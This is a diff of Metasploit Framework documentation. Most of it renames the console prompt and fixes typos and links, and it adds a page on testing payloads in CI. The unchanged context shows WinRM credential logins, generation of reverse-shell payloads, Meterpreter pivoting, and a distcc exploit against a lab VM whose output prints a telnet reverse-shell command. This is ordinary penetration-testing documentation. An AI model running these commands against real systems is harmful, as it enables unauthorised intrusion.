@@ -70,7 +70,7 @@ run https://192.168.123.139:5986
 Example:

 ```msf
-msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985
+msf auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985

 [+] 192.168.123.139:5985: Negotiate protocol supported
 [+] 192.168.123.139:5985: Kerberos protocol supported
@@ -123,14 +123,14 @@ run http://user:pass@192.168.123.139:5985
 Example:

 ```msf
-msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985
+msf auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985

 [!] No active DB -- Credential data will not be saved!
 [+] 192.168.123.139:5985 - Login Successful: WORKSTATION\user:pass
 [*] Command shell session 7 opened (192.168.123.1:58673 -> 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+msf auxiliary(scanner/winrm/winrm_login) > sessions -i -1
 [*] Starting interaction with 7...

 Microsoft Windows [Version 10.0.14393]
@@ -146,8 +146,8 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
 Open a WinRM session:

 ```msf
-msf6 > use auxiliary/scanner/winrm/winrm_login
-msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
+msf > use auxiliary/scanner/winrm/winrm_login
+msf auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

 [+] 192.168.123.13:88 - Received a valid TGT-Response
 [*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
@@ -159,7 +159,7 @@ msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Ad
 [*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+msf auxiliary(scanner/winrm/winrm_login) > sessions -i -1
 [*] Starting interaction with 1...

 Microsoft Windows [Version 10.0.14393]
@@ -61,7 +61,7 @@ When the user views the options for a given module, it will be consolidated. The
 Multiple options are available for configuring the module options:

 ```msf
-msf5 exploit(multi/http/tomcat_mgr_upload) > options
+msf exploit(multi/http/tomcat_mgr_upload) > options

 Module options (exploit/multi/http/tomcat_mgr_upload):

@@ -88,7 +88,7 @@ Exploit target:
 Multiple options are consolidated into a single TARGETS field:

 ```msf
-msf5 exploit(multi/http/tomcat_mgr_upload) > options
+msf exploit(multi/http/tomcat_mgr_upload) > options

 Module options (exploit/multi/http/tomcat_mgr_upload):

@@ -118,9 +118,9 @@ The values that are common to both `HTTP(S)` and `TCP` transports are:
    * `tcp://:<port>` - indicates that this payload is a _bind_ payload listening on the specified port (note that no host is specified).
    * `http://<host>:<port>/<uri>` - indicates that this payload is an HTTP connection (can only be _reverse_).
    * `https://<host>:<port>/<uri>` - indicates that this payload is an HTTPS connection (can only be _reverse_).
-* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the **Timeout documentation** (link coming soon).
+* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.

 The layout of this block in memory looks like the following:

@@ -159,8 +159,8 @@ At this time, there are no `TCP`-specific configuration values, as the common co
    * `http://<proxy ip>:<proxy port>` in the case of `HTTP` proxies.
    * `socks=<socks ip>:<sock port>` in the case of `socks` proxies.
 * **Proxy user name** - Some proxies require authentication. In such cases, this value contains the username that should be used to authenticate with the given proxy. This field is `64` characters in size (`wchar_t`).
-* Proxy password - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
-*** User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
+* **Proxy password** - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
+* **User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
 * **Expected SSL certificate hash** - Meterpreter has the capability of validating the SSL certificate that Metasploit presents when using `HTTPS`. This value contains the `20`-byte SHA1 hash of the expected certificate. For more information, please read the **SSL certificate validation documentation** (link coming soon).

 All values that are shown above need to be specified in the configuration, including SSL certificate validation for plain `HTTP` connections. Values that are not used should be zeroed out.
@@ -207,7 +207,7 @@ As already mentioned, more than one of these transport configuration blocks can

 ### Extension configuration block

-The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have **Stageless payloads** (link coming soon), and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the **Stageless payloads** (link coming soon) documentation.
+The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have [[Stageless payloads|./Meterpreter-Stageless-Mode.md]], and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the [[Stageless payloads|./Meterpreter-Stageless-Mode.md]] documentation.

 The extension configuration block also functions as a "list" to allow for an arbitrary number of extensions to be included. Each extension entry needs to contain:

@@ -8,7 +8,7 @@ There are currently two main ways to debug Meterpreter sessions:
 This can be enabled for any Meterpreter session, and does not require a debug Metasploit build:

 ```msf
-msf6 > setg SessionTlvLogging true
+msf > setg SessionTlvLogging true
 SessionTlvLogging => true
 ```

@@ -62,7 +62,7 @@ The result of your registry queries can be impacted if you are interacting with
 You can see the type of session you currently have open with the `sessions` command:

 ```msf
-msf6 exploit(windows/smb/psexec) > sessions
+msf exploit(windows/smb/psexec) > sessions

 Active sessions
 ===============
@@ -71,7 +71,7 @@ Related open tickets (slightly broader than Meterpreter):
 * Change desktop/phone background
 * Remote mouse control
 * Play sound on the remote system
- * Read words outloud via text to speech on the remote system
+ * Read words out loud via text to speech on the remote system
 * Volume control
 * RSS feed from reverse_http(s) mult-handler that I can connect a RSS reader to (or something like IFTTT) and get notices when new sessions are created
 * MessageBox popups
@@ -46,18 +46,18 @@ execute code such as adding user accounts, or executing a simple pingback comman
 Payload modules can also be used individually to generate standalone executables, or shellcode for use within exploits:

 ```msf
-msf6 payload(linux/x86/shell_reverse_tcp) > back
-msf6 > use payload/linux/x86/shell_reverse_tcp
-msf6 payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
+msf payload(linux/x86/shell_reverse_tcp) > back
+msf > use payload/linux/x86/shell_reverse_tcp
+msf payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
 lhost => 127.0.0.1
-msf6 payload(linux/x86/shell_reverse_tcp) > set lport 4444
+msf payload(linux/x86/shell_reverse_tcp) > set lport 4444
 lport => 4444

 # Generate a payload for use within C
-msf6 payload(linux/x86/shell_reverse_tcp) > generate -f c
+msf payload(linux/x86/shell_reverse_tcp) > generate -f c

 # Generate an ELF file for execution on Linux environments
-msf6 payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell
+msf payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell
 ```

 ### Post modules ({{ site.metasploit_module_counts["post"] }})
@@ -0,0 +1,41 @@
+Payloads for Metasploit Framework can now be tested when opening pull requests. This is handled by GitHub actions within 
+our CI, this workflow will build the payloads using the appropriate repositories and branches. It will then run our 
+acceptance tests against those changes. This requires adding GitHub labels for each corresponding payload repository. 
+The labels will contain the `payload-testing` prefix, each supporting testing for an external repository:
+ - `payload-testing-branch` ([https://github.com/rapid7/metasploit-payloads/](https://github.com/rapid7/metasploit-payloads/))
+ - `payload-testing-mettle-branch` ([https://github.com/rapid7/mettle/](https://github.com/rapid7/mettle/))
+
+**_Note_**:
+
+The long term aim is supporting workflow dispatches for this job, but that is currently not working as expected. So as a
+work-around we will need to edit the workflow locally. Once the testing has been completed ensure the following locally 
+changes are reverted before merging.
+
+Once the appropriate repository label is added, you will need to edit the GitHub workflow to point at the specific 
+repository and branch you want to test. Below I will outline some changes that are required to make this work, update 
+the following lines like so:
+
+1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L189):
+```yaml
+repository: foo-r7/metasploit-framework
+```
+
+2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L191):
+```yaml
+ref: fixes-all-the-bugs
+```
+
+3. Point at your forked repository that contains the payload changes you'd like to test - update lines [45](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L45) and [250](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L250):
+```yaml
+repository: foo-r7/metasploit-payloads
+```
+
+4. Point at your forked repository branch that contains the payload changes you'd like to test - update lines [47](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L47) and [252](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L252):
+```yaml
+ref: fixes-all-the-payload-bugs
+```
+
+Steps 3 and 4 outline the steps required when steps testing metasploit-payloads. The same steps apply for Mettle, the 
+following lines would need updated:
+ - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L156).
+ - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L158).
@@ -36,8 +36,8 @@ One of the easiest ways to do this is to use the `post/multi/manage/autoroute` m
 ```msf
 meterpreter > background
 [*] Backgrounding session 1...
-msf6 exploit(multi/handler) > use post/multi/manage/autoroute
-msf6 post(multi/manage/autoroute) > show options
+msf exploit(multi/handler) > use post/multi/manage/autoroute
+msf post(multi/manage/autoroute) > show options

 Module options (post/multi/manage/autoroute):

@@ -49,13 +49,13 @@ Module options (post/multi/manage/autoroute):
   SESSION                   yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

-msf6 post(multi/manage/autoroute) > set SESSION 1
+msf post(multi/manage/autoroute) > set SESSION 1
 SESSION => 1
-msf6 post(multi/manage/autoroute) > set SUBNET 169.254.0.0
+msf post(multi/manage/autoroute) > set SUBNET 169.254.0.0
 SUBNET => 169.254.0.0
-msf6 post(multi/manage/autoroute) > set NETMASK /16
+msf post(multi/manage/autoroute) > set NETMASK /16
 NETMASK => /16
-msf6 post(multi/manage/autoroute) > show options
+msf post(multi/manage/autoroute) > show options

 Module options (post/multi/manage/autoroute):

@@ -67,7 +67,7 @@ Module options (post/multi/manage/autoroute):
   SESSION  1                yes       The session to run this module on
   SUBNET   169.254.0.0      no        Subnet (IPv4, for example, 10.10.10.0)

-msf6 post(multi/manage/autoroute) > run
+msf post(multi/manage/autoroute) > run

 [!] SESSION may not be compatible with this module:
 [!]  * incompatible session platform: windows
@@ -76,12 +76,12 @@ msf6 post(multi/manage/autoroute) > run
 [+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
 [+] Route added to subnet 172.19.176.0/255.255.240.0 from host's routing table.
 [*] Post module execution completed
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```
 If we now use Meterpreter's `route` command we can see that we have two route table entries within Metasploit's routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets.

 ```msf
-msf6 post(multi/manage/autoroute) > route
+msf post(multi/manage/autoroute) > route

 IPv4 Active Routing Table
 =========================
@@ -92,16 +92,16 @@ IPv4 Active Routing Table
   172.19.176.0       255.255.240.0      Session 1

 [*] There are currently no IPv6 routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.

 ```msf
-msf6 post(multi/manage/autoroute) > route flush
-msf6 post(multi/manage/autoroute) > route
+msf post(multi/manage/autoroute) > route flush
+msf post(multi/manage/autoroute) > route
 [*] There are currently no routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```
 Now lets trying doing the same thing manually.

@@ -109,13 +109,13 @@ Now lets trying doing the same thing manually.
 Here we can use `route add <IP ADDRESS OF SUBNET> <NETMASK> <GATEWAY>` to add the routes from within Metasploit, followed by `route print` to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through.

 ```msf
-msf6 post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
+msf post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
 [*] Route added
-msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
+msf post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
 [-] Invalid gateway
-msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240.0 1
+msf post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240.0 1
 [*] Route added
-msf6 post(multi/manage/autoroute) > route print
+msf post(multi/manage/autoroute) > route print

 IPv4 Active Routing Table
 =========================
@@ -126,15 +126,15 @@ IPv4 Active Routing Table
   172.19.176.0       255.255.240.0      Session 1

 [*] There are currently no IPv6 routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 Finally we can check that the route will use session 1 by using `route get 169.254.204.110`

 ```msf
-msf6 post(multi/manage/autoroute) > route get 169.254.204.110
+msf post(multi/manage/autoroute) > route get 169.254.204.110
 169.254.204.110 routes through: Session 1
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 If we want to then remove a specific route (such as in this case we want to remove the 172.19.176.0/20 route since we don't need that for this test), we can issue the `route del` or `route remove` commands with the syntax `route remove <IP ADDRESS OF SUBNET><NETMASK IN SLASH FORMAT> <GATEWAY>`
@@ -142,9 +142,9 @@ If we want to then remove a specific route (such as in this case we want to remo
 Example:

 ```msf
-msf6 post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
+msf post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
 [*] Route removed
-msf6 post(multi/manage/autoroute) > route
+msf post(multi/manage/autoroute) > route

 IPv4 Active Routing Table
 =========================
@@ -154,14 +154,14 @@ IPv4 Active Routing Table
   169.254.0.0        255.255.0.0        Session 1

 [*] There are currently no IPv6 routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 ## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

 ```msf
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
+msf exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

 Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

@@ -195,7 +195,7 @@ Payload options (cmd/windows/powershell_reverse_tcp):
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         172.19.182.171   yes       The listen address (an interface may be speci
-                                            fied)
+                                            field)
   LOAD_MODULES                   no        A list of powershell modules separated by a c
                                            omma to download over the web
   LPORT         4444             yes       The listen port
@@ -208,11 +208,11 @@ Exploit target:
   0   Windows Command


-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > check
+msf exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > check

 [*] Target is an Exchange Server!
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
+msf exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```

 ## SMB Named Pipe Pivoting in Meterpreter
@@ -222,23 +222,23 @@ The Windows Meterpreter payload supports lateral movement in a network through S
 First open a Windows Meterpreter session to the pivot machine:

 ```msf
-msf6 > use payload/windows/x64/meterpreter/reverse_tcp
-smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
+msf > use payload/windows/x64/meterpreter/reverse_tcp
+smsf payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
 lhost => 172.19.182.171
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
+msf payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
 lport => 4578
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(windows/x64/meterpreter/reverse_tcp) > to_handler
 [*] Payload Handler Started as Job 0

 [*] Started reverse TCP handler on 172.19.182.171:4578 
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
+msf payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
 [*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
 ```

 Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:

 ```msf
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+msf payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
 [*] Starting interaction with 1...

 meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
@@ -250,7 +250,7 @@ meterpreter > background
 Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.

 ```msf
-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > show options

 Module options (payload/windows/x64/meterpreter/reverse_named_pipe):

@@ -260,17 +260,17 @@ Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
   PIPEHOST  .                yes       Host of the pipe to connect to
   PIPENAME  msf-pipe         yes       Name of the pipe to listen on

-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
 pipehost => 169.254.16.221
-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
 [*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
 ```

 After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
 ```msf
-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500

-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > sessions

 Active sessions
 ===============
@@ -384,8 +384,8 @@ Once routes are established, Metasploit modules can access the IP range specifie
 Metasploit can launch a SOCKS proxy server using the module: `auxiliary/server/socks_proxy`. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit's routing tables. Here is an example of how this module might be used:

 ```msf
-msf6 > use auxiliary/server/socks_proxy
-msf6 auxiliary(server/socks_proxy) > show options
+msf > use auxiliary/server/socks_proxy
+msf auxiliary(server/socks_proxy) > show options

 Module options (auxiliary/server/socks_proxy):

@@ -407,16 +407,16 @@ Auxiliary action:
   Proxy  Run a SOCKS proxy server


-msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
+msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
 SRVHOST => 127.0.0.1
-msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
+msf auxiliary(server/socks_proxy) > set SRVPORT 1080
 SRVPORT => 1080
-msf6 auxiliary(server/socks_proxy) > run
+msf auxiliary(server/socks_proxy) > run
 [*] Auxiliary module running as background job 0.
-msf6 auxiliary(server/socks_proxy) >
+msf auxiliary(server/socks_proxy) >
 [*] Starting the SOCKS proxy server

-msf6 auxiliary(server/socks_proxy) > jobs
+msf auxiliary(server/socks_proxy) > jobs

 Jobs
 ====
@@ -425,7 +425,7 @@ Jobs
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

-msf6 auxiliary(server/socks_proxy) >
+msf auxiliary(server/socks_proxy) >
 ```

 ### proxychains-ng Setup
@@ -18,7 +18,7 @@ Assuming you have installed Metasploit, either with the official Rapid7 nightly

 Metasploit Documentation: https://docs.metasploit.com/

-msf6 >
+msf >
 ```

 ### Finding modules
@@ -33,7 +33,7 @@ Metasploit is based around the concept of [[modules]]. The most commonly used mo
 You can use the `search` command to search for modules:

 ```msf
-msf6 > search type:auxiliary http html title tag
+msf > search type:auxiliary http html title tag

 Matching Modules
 ================
@@ -45,15 +45,15 @@ Matching Modules

 Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title

-msf6 >
+msf >
 ```

 You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
 active module:

 ```msf
-msf6 > use auxiliary/scanner/http/title
-msf6 auxiliary(scanner/http/title) > 
+msf > use auxiliary/scanner/http/title
+msf auxiliary(scanner/http/title) > 
 ```

 ### Running Auxiliary modules
@@ -62,14 +62,14 @@ Auxiliary modules do not exploit a target, but can perform data gathering or adm
 extracting the HTTP title from a server:

 ```msf
-msf6 > use auxiliary/scanner/http/title
-msf6 auxiliary(scanner/http/title) > 
+msf > use auxiliary/scanner/http/title
+msf auxiliary(scanner/http/title) > 
 ```

 Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:

 ```msf
-msf6 auxiliary(scanner/http/title) > show options
+msf auxiliary(scanner/http/title) > show options

 Module options (auxiliary/scanner/http/title):

@@ -88,21 +88,21 @@ Module options (auxiliary/scanner/http/title):

 View the full module info with the info, or info -d command.

-msf6 auxiliary(scanner/http/title) > 
+msf auxiliary(scanner/http/title) > 
 ```

 To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that 
 the module will run against:

 ```msf
-msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
+msf auxiliary(scanner/http/title) > set RHOSTS google.com
 RHOSTS => google.com
 ```

 The `run` command will run the module against the target, showing the target's HTTP title:

 ```msf
-msf6 auxiliary(scanner/http/title) > run
+msf auxiliary(scanner/http/title) > run

 [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
 [*] Scanned 1 of 1 hosts (100% complete)
@@ -113,7 +113,7 @@ New in Metasploit 6 there is added support for running modules with options set
 both `RHOSTS` and enabling `HttpTrace` functionality:

 ```msf
-msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 
+msf auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 

 ####################
 # Request:
@@ -142,7 +142,7 @@ The document has moved
 [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/http/title) > 
+msf auxiliary(scanner/http/title) > 
 ```

 ### Running exploit modules
@@ -156,9 +156,9 @@ For instance in a Virtual Machine, or with Docker. There are multiple pre-built
 For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:

 ```msf
-msf6 > use unix/misc/distcc_exec
+msf > use unix/misc/distcc_exec
 [*] Using configured payload cmd/unix/reverse_bash
-msf6 exploit(unix/misc/distcc_exec) > 
+msf exploit(unix/misc/distcc_exec) > 
 ```

 Exploit modules will generally at a minimum require the following options to be set:
@@ -170,7 +170,7 @@ Exploit modules will generally at a minimum require the following options to be
 Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > options
+msf exploit(unix/misc/distcc_exec) > options

 Module options (exploit/unix/misc/distcc_exec):

@@ -198,24 +198,24 @@ Exploit target:

 View the full module info with the info, or info -d command.

-msf6 exploit(unix/misc/distcc_exec) > 
+msf exploit(unix/misc/distcc_exec) > 
 ```

 For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
+msf exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
 rhost => 192.168.123.133
-msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
+msf exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
 lhost => 192.168.123.1
-msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
+msf exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
 payload => cmd/unix/reverse
 ```

 The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > run
+msf exploit(unix/misc/distcc_exec) > run

 [+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
 [*] Started reverse TCP double handler on 192.168.123.1:4444 
@@ -238,7 +238,7 @@ daemon
 New in Metasploit 6 there is added support for running modules with options set as part of the run command:

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
+msf exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse

 [+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
 [*] Started reverse TCP double handler on 192.168.123.1:4444
@@ -163,7 +163,7 @@ Start `msfconsole` and verify postgresql connection using the `db_status` comman
 mv ~/.msf4/config ~/.msf4/config.disable
 ./msfconsole
 ...
-msf5 > db_status 
+msf > db_status 
 [*] Connected to msf. Connection type: postgresql.
 ```

@@ -171,4 +171,4 @@ Drop (delete) the cluster:

 ```
 PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf
-```
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.5
 .3.8